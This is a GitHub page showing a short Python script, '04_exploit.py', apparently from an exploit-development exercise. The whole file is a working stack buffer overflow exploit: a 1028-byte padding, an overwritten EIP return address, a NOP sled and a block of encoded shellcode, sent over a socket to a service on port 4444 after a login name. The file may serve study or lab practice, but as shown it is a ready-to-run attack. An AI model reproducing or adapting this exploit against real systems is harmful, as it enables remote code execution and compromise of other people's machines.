-
Notifications
You must be signed in to change notification settings - Fork 0
/
04_exploit.py
55 lines (50 loc) · 2.34 KB
/
04_exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
#!/usr/bin/env python3
import socket, time, sys
ip = "127.0.0.1"
port = 4444
timeout = 5
offset = b'A' * 1028
EIP = b'\x73\x6d\x47\x10' #10476d73
NOPS = b'\x90' * 16
shellcode = b""
shellcode += b"\xbf\xa5\xd9\x28\x4f\xd9\xe1\xd9\x74\x24\xf4"
shellcode += b"\x5d\x29\xc9\xb1\x52\x31\x7d\x12\x03\x7d\x12"
shellcode += b"\x83\x60\xdd\xca\xba\x96\x36\x88\x45\x66\xc7"
shellcode += b"\xed\xcc\x83\xf6\x2d\xaa\xc0\xa9\x9d\xb8\x84"
shellcode += b"\x45\x55\xec\x3c\xdd\x1b\x39\x33\x56\x91\x1f"
shellcode += b"\x7a\x67\x8a\x5c\x1d\xeb\xd1\xb0\xfd\xd2\x19"
shellcode += b"\xc5\xfc\x13\x47\x24\xac\xcc\x03\x9b\x40\x78"
shellcode += b"\x59\x20\xeb\x32\x4f\x20\x08\x82\x6e\x01\x9f"
shellcode += b"\x98\x28\x81\x1e\x4c\x41\x88\x38\x91\x6c\x42"
shellcode += b"\xb3\x61\x1a\x55\x15\xb8\xe3\xfa\x58\x74\x16"
shellcode += b"\x02\x9d\xb3\xc9\x71\xd7\xc7\x74\x82\x2c\xb5"
shellcode += b"\xa2\x07\xb6\x1d\x20\xbf\x12\x9f\xe5\x26\xd1"
shellcode += b"\x93\x42\x2c\xbd\xb7\x55\xe1\xb6\xcc\xde\x04"
shellcode += b"\x18\x45\xa4\x22\xbc\x0d\x7e\x4a\xe5\xeb\xd1"
shellcode += b"\x73\xf5\x53\x8d\xd1\x7e\x79\xda\x6b\xdd\x16"
shellcode += b"\x2f\x46\xdd\xe6\x27\xd1\xae\xd4\xe8\x49\x38"
shellcode += b"\x55\x60\x54\xbf\x9a\x5b\x20\x2f\x65\x64\x51"
shellcode += b"\x66\xa2\x30\x01\x10\x03\x39\xca\xe0\xac\xec"
shellcode += b"\x5d\xb0\x02\x5f\x1e\x60\xe3\x0f\xf6\x6a\xec"
shellcode += b"\x70\xe6\x95\x26\x19\x8d\x6c\xa1\x2c\x58\x60"
shellcode += b"\xf7\x59\x5e\x7c\xff\xd0\xd7\x9a\x95\xf2\xb1"
shellcode += b"\x35\x02\x6a\x98\xcd\xb3\x73\x36\xa8\xf4\xf8"
shellcode += b"\xb5\x4d\xba\x08\xb3\x5d\x2b\xf9\x8e\x3f\xfa"
shellcode += b"\x06\x25\x57\x60\x94\xa2\xa7\xef\x85\x7c\xf0"
shellcode += b"\xb8\x78\x75\x94\x54\x22\x2f\x8a\xa4\xb2\x08"
shellcode += b"\x0e\x73\x07\x96\x8f\xf6\x33\xbc\x9f\xce\xbc"
shellcode += b"\xf8\xcb\x9e\xea\x56\xa5\x58\x45\x19\x1f\x33"
shellcode += b"\x3a\xf3\xf7\xc2\x70\xc4\x81\xca\x5c\xb2\x6d"
shellcode += b"\x7a\x09\x83\x92\xb3\xdd\x03\xeb\xa9\x7d\xeb"
shellcode += b"\x26\x6a\x9d\x0e\xe2\x87\x36\x97\x67\x2a\x5b"
shellcode += b"\x28\x52\x69\x62\xab\x56\x12\x91\xb3\x13\x17"
shellcode += b"\xdd\x73\xc8\x65\x4e\x16\xee\xda\x6f\x33"
string = offset + EIP + NOPS + shellcode
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(timeout)
s.connect((ip, port))
print(s.recv(1024))
s.send(b'Administrator'+b'\r\n')
print(s.recv(1024))
s.send(string + b'\r\n')
print(s.recv(1024))